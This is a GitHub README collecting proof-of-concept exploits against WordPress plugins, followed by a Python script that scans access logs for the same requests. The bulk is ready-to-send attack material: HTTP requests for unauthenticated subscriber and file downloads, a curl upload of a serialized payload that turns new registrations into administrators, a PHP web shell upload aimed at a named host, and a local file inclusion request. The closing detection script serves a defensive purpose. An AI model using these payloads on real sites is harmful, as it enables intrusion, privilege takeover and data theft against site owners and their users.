https://github.com/randomrobbiebf/wordpress-exploits


# wordpress-exploits

Random Wordpress Exploits May or May Not Work.

CVE-2019-19985
---

### Info

```
Description: Unauthenticated File Download w/ Information Disclosure
CVE ID: CVE-2019-19985
CVSS v3.0 Score: 5.8 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3
```

### POC

```
GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=es_subscribers&action=export
Connection: close
Content-Length: 2
```

### Info

```
Easy WP SMTP Plugin for WordPress 1.3.9 RCE/Add Admin

The popular Easy WP SMTP plugin, which has 300,000+ active installations, was prone to a critical zero-day vulnerability that allowed an unauthenticated user to modify WordPress options or to inject and execute code, among other malicious actions.

```

### POC

```
The following proof of concept uses swpsmtp_import_settings to upload a file containing a malicious serialized payload that enables user registration (users_can_register) and sets the default user role (default_role) to “administrator” in the database.

1. Create a file name “/tmp/upload.txt” and add this content to it:

> a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

2. Upload the file:

>$ curl https://TARGET.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'
```

### Info

```
The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
```

### POC

```
POST /wp-content/plugins/cherry-plugin/admin/import-export/upload.php HTTP/1.1
Host: lovi.studio
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
Content-Length: 522
Content-Type: multipart/form-data; boundary=db6aa92af633763a3f43abd6cde64077

--db6aa92af633763a3f43abd6cde64077
Content-Disposition: form-data; name="file"; filename="shell.php"

=`$_GET[0]`?>
```

### Info

```
WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
```

### POC

```
POST /?es=export HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

option=view_all_subscribers

```

Download Manager < 2.6.3
----

```
POST /wp-admin/admin.php?task=wpdm_dir_tree HTTP/1.1
Host: 192.168.1.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.134/wp-admin/post-new.php?post_type=wpdmpro
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 33
Origin: http://192.168.1.134
Connection: close

dir=%2Fvar%2Fwww/html/wp-content/
```

```
Title: Arbitrary Shortcode Execution & Local File Inclusion
Product: WOOF - WooCommerce Products Filter (PluginUs.Net)
Vulnerable Version: 1.1.9
Fixed Version: 2.2.0
```

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wordpress.lan
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 75

action=woof_redraw_woof&shortcode=woof_search_options&pagepath=/etc/hosts
```
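A defender-side detection pass over web server access logs for the request signatures collected in this README, as an added example that is not part of the repository: it assumes Combined Log Format lines, and the sample log entries below are constructed.

```python
import re
from urllib.parse import unquote

# Request-line signatures from the PoCs in this README. The Easy WP SMTP and WOOF PoCs put
# their parameters in a POST body to admin-ajax.php, so they need body logging, not this.
SIGNATURES = [
    ("CVE-2019-19985 email-subscribers report download",
     re.compile(r"^/wp-admin/admin\.php\?(?=.*\bpage=download_report\b)(?=.*\breport=users\b)")),
    ("email-subscribers 3.4.7 subscriber export", re.compile(r"^/\?es=export(?:&|$)")),
    ("cherry-plugin upload endpoint",
     re.compile(r"^/wp-content/plugins/cherry-plugin/admin/import-export/upload\.php")),
    ("download-manager wpdm_dir_tree listing",
     re.compile(r"^/wp-admin/admin\.php\?(?=.*\btask=wpdm_dir_tree\b)")),
]

# Combined Log Format: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def scan(lines):
    """One hit dict per log line whose (URL-decoded) request target matches a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                            # not a request line in the expected format
        target = unquote(m.group("target"))     # percent-encoding must not hide a match
        for name, pattern in SIGNATURES:
            if pattern.search(target):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
                             "method": m.group("method"), "target": target, "signature": name})
                break
    return hits

def served_by_ip(hits):
    """Hits per source IP that the server answered 2xx: the endpoint was actually reachable."""
    counts = {}
    for h in hits:
        if h["status"].startswith("2"):
            counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts

# Constructed sample lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1" 200 51233',
    '203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "POST /wp-admin/admin.php?task=wpdm_dir_tree HTTP/1.1" 403 199',
    '198.51.100.4 - - [10/Oct/2023:13:57:12 +0000] "GET /wp-login.php HTTP/1.1" 200 4832',
    '203.0.113.7 - - [10/Oct/2023:13:58:44 +0000] "POST /wp-content/plugins/cherry-plugin/admin/import-export/upload.php HTTP/1.1" 200 77',
    '198.51.100.4 - - [10/Oct/2023:13:59:03 +0000] "POST /?es=export HTTP/1.1" 200 9120',
]
```

A 403 hit still tells you someone probed the endpoint; the 2xx subset is where to check whether the affected plugin version was actually installed.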